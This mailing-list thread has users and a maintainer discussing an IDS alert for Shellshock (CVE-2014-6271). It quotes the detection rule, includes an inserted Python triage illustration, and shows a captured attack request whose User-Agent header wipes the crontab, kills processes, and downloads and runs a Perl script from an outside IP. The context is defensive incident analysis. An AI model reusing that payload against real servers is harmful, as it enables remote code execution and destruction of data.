ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers error


Donato Donatello

Sep 25, 2014, 10:34:00 AM9/25/14
to securit...@googlegroups.com
I get this error nowadays. Could anyone explain this alert to me?

Src and Dst ips are the physical machines on which the servers are running.
On these machines VMware is set up and all system servers are configured to run on this virtual machine. Sometimes the processes migrate from one to another and a lot of false positives occurred then. But I suspect this error and want to hear any helpful advice.

Thanks;

Doug Burks

Sep 25, 2014, 10:46:56 AM9/25/14
to securit...@googlegroups.com
Hi Donato,

Replies inline.

On Thu, Sep 25, 2014 at 10:34 AM, Donato Donatello
<someoned...@gmail.com> wrote:
> I get this error nowadays.

What do you mean by "error"? Do you mean "alert"?

> Could anyone explain this alert to me?

This alert is related to the bash vulnerability I blogged about yesterday:
http://blog.securityonion.net/2014/09/bash-vulnerability.html

Emerging Threats released rules to detect possible attempts:
http://emergingthreats.net/daily-ruleset-update-summary-09242014/

Here is the specific rule you're referring to:
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB_SERVER
Possible CVE-2014-6271 Attempt in Headers";
flow:established,to_server; content:"|28 29 20 7b 20|"; http_header;
fast_pattern:only;
reference:url,blogs.akamai.com/2014/09/environment-bashing.html;
classtype:attempted-admin; sid:2019232; rev:2;)

> Src and Dst ips are the physical machines on which the servers are running.

What "servers"? Your Security Onion servers? Are these servers
exposed to the Internet?

> On these machines VMware is set up and all system servers are configured to run on this virtual machine. Sometimes the processes migrate from one to another and a lot of false positives occurred then. But I suspect this error and want to hear any helpful advice.

You should pivot from the alert to pcap/transcript to determine if
this is something that you need to be concerned about or if this is
potentially a false positive.


--
Doug Burks
Need Security Onion Training or Commercial Support?
http://securityonionsolutions.com

Juanma Lainez

Mar 6, 2015, 2:06:13 PM3/6/15
to securit...@googlegroups.com
Hi Doug,

First, a gazillion thanks for such awesome work!!!! I am learning a lot from it. Now to the point.

I have received an alert from the same rule as Donato. I have pivoted from Snorby to Sguil and reviewed the payload, the pcap with Wireshark, the Bro transcript, etc.

I am a little concerned about the payload. It looks like someone tried to use, or successfully used, my web server to get something from another host, possibly 64.32.12.152.

I have gathered info on both the possible source of this payload and the IP above.

From the capme file this is the part that I do not like at all:

--------------------

Src IP: 31.184.194.114 (Unknown)
Src Port: 54904
Dst Port: 80
OS Fingerprint: 31.184.194.114:54904 - UNKNOWN [S20:56:1:60:M1460,S,T,N,W7:.:?:?] (up: 911 hrs)

"...SRC: GET /cgi-bin/cgi.cgi HTTP/1.1
SRC: Accept: */*
SRC: Accept-Language: en-us
SRC: Accept-Encoding: gzip, deflate
SRC: User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*");'
SRC: Host: 151.224.41.41
SRC: Connection: Close
SRC:
SRC:
DST: HTTP/1.1 404 Not Found
DST: Content-Type: text/html; charset=us-ascii
DST: Server: Microsoft-HTTPAPI/2.0
DST: Date: Fri, 06 Mar 2015 17:17:09 GMT
DST: Connection: close
DST: Content-Length: 315
DST:
DST: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
DST: <HTML><HEAD><TITLE>Not Found</TITLE>
DST: <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
DST: <BODY><h2>Not Found</h2>
DST: <hr><p>HTTP Error 404. The requested resource is not found.</p>
DST: </BODY></HTML>"

--------------------

Any thoughts?

Doug Burks

Mar 6, 2015, 4:50:30 PM3/6/15
to securit...@googlegroups.com
Hi Juanma,

Public facing web servers see lots of ShellShock attempts like this.
However, just because you're seeing *attempts* doesn't actually mean
that those attempts succeeded. Looks like the ShellShock scanner did
an HTTP GET request for /cgi-bin/cgi.cgi, which doesn't exist on your
web server (which is why it then responded with "404 Not Found"
instead of "SUCCESS!" as shown in the GET request). If you don't have
machines in your environment that are vulnerable to
CVE-2014-6271/CVE-2014-7169, then you may want to simply disable this
particular rule.

You may also be interested in the Bro ShellShock script which detects
ShellShock attempts that actually succeeded:
http://blog.securityonion.net/2014/10/new-securityonion-bro-scripts-and.html
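The rule quoted earlier in the thread only matches the five bytes |28 29 20 7b 20| ("() { ") anywhere in a request header, and Doug's triage above rests on comparing that request with the server's reply. The following Python, added here as an illustration and not code from Security Onion, Emerging Threats or anyone in the thread, reproduces the header match and then classifies a request/response pair the way Doug did: a 4xx/5xx reply is an attempt only, a reply carrying the literal the injected command asked the shell to print is a likely success, and anything else needs a look at the pcap. The sample messages are constructed, with a documentation IP in place of the real hosts.

```python
import re

# Byte content from ET sid:2019232 (|28 29 20 7b 20| == b"() { ")
RULE_CONTENT = b"\x28\x29\x20\x7b\x20"

def split_http(raw: bytes):
    """Split a raw HTTP message into (start line, {lowercased header: value}, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")   # only the first colon separates the name
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def matching_headers(request: bytes) -> list:
    """Names of request headers whose value contains the rule content (the http_header match)."""
    _, headers, _ = split_http(request)
    return sorted(n.decode() for n, v in headers.items() if RULE_CONTENT in v)

def expected_marker(payload: bytes):
    """Last quoted literal in the injected command, after any \\r\\n escapes (e.g. XSUCCESS!)."""
    quoted = re.findall(rb'"([^"]*)"', payload)
    if not quoted:
        return None
    fragments = re.split(rb"\\r\\n|\\n", quoted[-1])
    return fragments[-1] or None

def triage(request: bytes, response: bytes) -> str:
    """Classify a request/response pair: no-match, attempt-only, likely-success, needs-review."""
    hits = matching_headers(request)
    if not hits:
        return "no-match"
    _, req_headers, _ = split_http(request)
    status, _, body = split_http(response)
    code = status.split(b" ")[1] if b" " in status else b"?"
    marker = expected_marker(req_headers[hits[0].encode()])
    if marker and marker in body:
        return "likely-success"   # the shell ran the command and its output came back
    if code[:1] in (b"4", b"5"):
        return "attempt-only"     # target CGI absent or refused, no sign of execution
    return "needs-review"         # 2xx without the marker: inspect the pcap/transcript

# Constructed samples modelled on the transcript in this thread (192.0.2.10 is a placeholder).
REQUEST = (b"GET /cgi-bin/cgi.cgi HTTP/1.1\r\n"
           b"User-Agent: () { :;}; /usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\"'\r\n"
           b"Host: 192.0.2.10\r\nConnection: Close\r\n\r\n")
BENIGN = b"GET / HTTP/1.1\r\nUser-Agent: curl/7.35.0\r\nHost: 192.0.2.10\r\n\r\n"
RESPONSE_404 = b"HTTP/1.1 404 Not Found\r\nContent-Type: text/html\r\n\r\n<h2>Not Found</h2>"
RESPONSE_HIT = b"HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\nXSUCCESS!"
RESPONSE_200 = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>ok</html>"
```

Run `triage(REQUEST, RESPONSE_404)` to reproduce Juanma's case (attempt-only); swap in RESPONSE_HIT to see what a successful execution would have looked like.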

Juanma Lainez

Mar 6, 2015, 6:51:44 PM3/6/15
to securit...@googlegroups.com
Doug, many thanks for your time answering my query. I see loads of attacks being detected by Security Onion; I was just a little concerned about this last one. The distro is a work of art, indispensable for my learning. As I said before, thank you very much.

Kindest Regards

Juan